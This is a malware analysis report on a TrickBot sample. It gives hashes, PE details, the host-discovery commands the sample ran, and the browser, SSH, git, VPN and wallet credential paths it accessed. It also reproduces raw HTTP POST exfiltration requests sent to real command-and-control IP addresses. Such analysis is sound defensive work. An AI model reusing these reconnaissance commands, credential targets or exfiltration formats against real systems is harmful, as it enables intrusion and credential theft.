Malware Analysis: TrickBot
Disclaimer
The following is a Malware analysis report for the binary with SHA-256 hash 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3.
The binary can be downloaded from MalwareBazaar
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.
Opinions
TrickBots main goal, being a banking trojan at heart, is to steal credit card and banking account information.
However that has not been lucrative enough for the bad actors, hence more and more data is being searched for and the use of stage two payloads has increased.
This sample was only running for 15-20 minutes. Typically in TrickBot infections the malware will continue to beacon out indefinitely.
It is not uncommon to see a stage two payload pushed to beaconing victims days after the initial infections.
Typically the stage two payload will be more persistent and usually is either a ransomware variant, or a crypto miner.
TrickBot, like other popular trojans, will continue to evolve.
Anti-analysis techniques will be added. Capabilities will be added.
Whether its stealing financial or personal data or delivering ransomware, as long as there is a way to profit from it, it will continue to be used.
Analysis Summary
When executed this malware spawns another instance of itself.
This new process then runs and injects malicious code into the legitimate windows process wermgr.exe.
Wermgr.exe then calls svchost to run the host discovery commands.
The discovery seen in this sample involves running ipconfig.exe, net.exe, nltest.exe, as well as a GET request to wtfismyip[.]com which returns the public IP of the host.
Aside from data about the host and network the malware searched for sensitive information on the host as well.
Crypto currency credentials, ssh credentials, vpn credentials and configurations, vnc credentials and configurations, git credentials, as well as browser history, cache and saved passwords were searched for.
The malware then exfiltrates this data over HTTPS in a POST request to several of its C2 servers.
One of the POST requests indicate that credit card information may have also been searched for in the files on the host.
As for persistence, nothing of note was done, there were no created registry keys, scheduled tasks, or services.
Environment and tools
Static Analysis
| Data | Value |
|---|---|
| File Size | 540724 bytes |
| Code Signing | Unsigned |
| MD5 | 5930091b65aed9627dd1a4e86458b72f |
| SHA1 | 1e6ee2e805e21c007aa70217856bf31141ccc552 |
| SHA256 | 91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3 |
| SSDEEP | 6144:QXRZwJkHAfrJoz9KnjY/F0eAcLeRpJ0ulEypWu/blRTZSMIbBkfoqpArjO:QXRZmrJoBKIqkapJDmy4uBRTQ4pD |
| IMPHash | a9daf8a064784a80002aa6baaea5ce3b |
| Compile Time | Wed Jul 22 08:55:12 2020 |
| Packed | No |
| Compiler | Microsoft Visual Basic 6.0 |
| Linker | Microsoft Linker |
| Overlay | PDB 2.0 file link |
| Entropy | 6.827 |
PE Sections
| PE Section | MD5 | Entropy | Size | Entry Point | Access |
|---|---|---|---|---|---|
| .text | 9F4717E23F056519B2BEEB92221702EB | 5.838 | 339968 bytes | 0x0000487C | R,X |
| .data | 620F0B67A91F7F74151BC5BE745B7110 | 0 | 4096 bytes | R,W,ID | |
| .rsrc | 34DEF4049197F06B4075C6A749B19987 | 7.895 | 192512 bytes | R,ID |
Imports
| Library | Count |
|---|---|
| oleaut32.dll | 1 |
| kernel32.dll | 1 |
| MSVBVM60.DLL | 144 |
Possible Breakpoints
- VirtualAlloc
Capabilities
| Capability | Namespace |
|---|---|
| execute anti-VM instructions (2 matches) | anti-analysis/anti-vm/vm-detection |
| contains PDB path | executable/pe/pdb |
| contain a resource (.rsrc) section | executable/pe/section/rsrc |
| parse PE header (4 matches) | load-code/pe |
Tactics and Techniques
| ATT&CK Tactic | ATT&CK Technique |
|---|---|
| DEFENSE EVASION | Virtualization/Sandbox Evasion::System Checks [T1497.001] |
| EXECUTION | Shared Modules [T1129] |
OSINT
Behavioral Analysis
Processes
| Process | PID | Command Line |
|---|---|---|
| 91beb7c43da3dd….exe | 5388 | 91beb7c43da3dd….exe |
| 91beb7c43da3dd….exe | 3128 | 91beb7c43da3dd….exe |
| wermgr.exe | 2904 | wermgr.exe |
| svchost.exe | 5204 | svchost.exe |
| svchost.exe | 6944 | svchost.exe |
| ipconfig.exe | 6016 | ipconfig /all |
| net.exe | 6240 | net config workstation |
| net.exe | 6404 | net view /all |
| net.exe | 264 | net view /all /domain |
| nltest.exe | 6556 | nltest /domain_trusts |
| nltest.exe | 3808 | nltest /domain_trusts /all_trusts |
Files Created
C:\Users\REM\AppData\Local\Temp\~DF5E8D1E64DE577706.TMP
Files Accessed
C:\Program Files\UltraVNC\ultravnc.ini
C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini
C:\Program Files (x86)\UltraVNC\ultravnc.ini
C:\Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State.bak
C:\Users\REM\.config\git\credentials
C:\Users\REM\.git-credentials
Directories Listed
C:\Users\REM\AppData\Roaming\bitcoin
C:\Users\REM\AppData\Roaming\litecoin
C:\Users\REM\.ssh
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCookies
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\REM\AppData\Local\Microsoft\Windows\INetCache\IE
PCAP
Protocols
| Protocol | Number of Packets |
|---|---|
| TCP | 1218 |
| SSL | 623 |
| HTTP | 10 |
Indicators of Compromise
- 103.12.161.194
- 103.111.83.246
- 103.12.161.194
- 82.146.46.209
- 194.5.249.157
- 96.9.73.73
- 203.176.135.102
Exfiltration
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------KNFVSHSAHHJUPYKX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="data" -----------KNFVSHSAHHJUPYKX Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------KNFVSHSAHHJUPYKX--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OCPLLBXQPEACMBMT User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="billinfo" {]}-----------OCPLLBXQPEACMBMT Content-Disposition: form-data; name="cardinfo" {]} -----------OCPLLBXQPEACMBMT--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------IMJCMDOMDOMKUGNM User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 219 Connection: Close Cache-Control: no-cache -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="data" -----------IMJCMDOMDOMKUGNM Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------IMJCMDOMDOMKUGNM--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------OTTNHTNLBMUSVCXD User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 194.5.249.157:443 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="data" -----------OTTNHTNLBMUSVCXD Content-Disposition: form-data; name="source" OpenSSH private keys -----------OTTNHTNLBMUSVCXD--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/83/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------QAKGETNFFXRQJOMX User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 473 Connection: Close Cache-Control: no-cache -----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="formdata" {"descr":["NordVPN"],"dns1":["103.86.99.100"],"email":["USERNAME"],"q":["microsoft office"],"search":["91beb7c43da3dd723c9d44629ab656b4f913c5ec111d1d362279938645f7edd3"],"usernamefld":["admin"]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="billinfo" {]}-----------QAKGETNFFXRQJOMX Content-Disposition: form-data; name="cardinfo" {]} -----------QAKGETNFFXRQJOMX--
POST /tot773/DESKTOP-2C3IQHO_W10016299.4059EF9DC2CA46AD60D2E0765459BD36/81/ HTTP/1.1 Accept: */* Content-Type: multipart/form-data; boundary=---------BSBWMEZDSAFVUJLA User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 96.9.73.73 Content-Length: 210 Connection: Close Cache-Control: no-cache -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="data" -----------BSBWMEZDSAFVUJLA Content-Disposition: form-data; name="source" OpenSSH private keys -----------BSBWMEZDSAFVUJLA--